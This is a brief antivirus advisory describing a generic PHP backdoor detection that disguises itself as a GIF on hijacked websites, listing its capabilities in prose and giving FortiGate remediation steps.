PHP/Rst.CO!tr.bdr is a generic detection for a backdoor Trojan. Since this is a generic detection, this malware may have varying behaviour.
Below are some of the observed characteristics/behaviours:
- This malware may be implanted in hijacked websites.
- Once implanted, this malware may feign a GIF but has embedded PHP that may have some or all of the following capabilties:
- allow for file uploading
- allow for command line executions
- allow for database manipulation
- reveal user info
- involve password cracking techniques
- Below is an illustration of this malware:
- Figure 1: Malware.
- FortiGate Systems
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.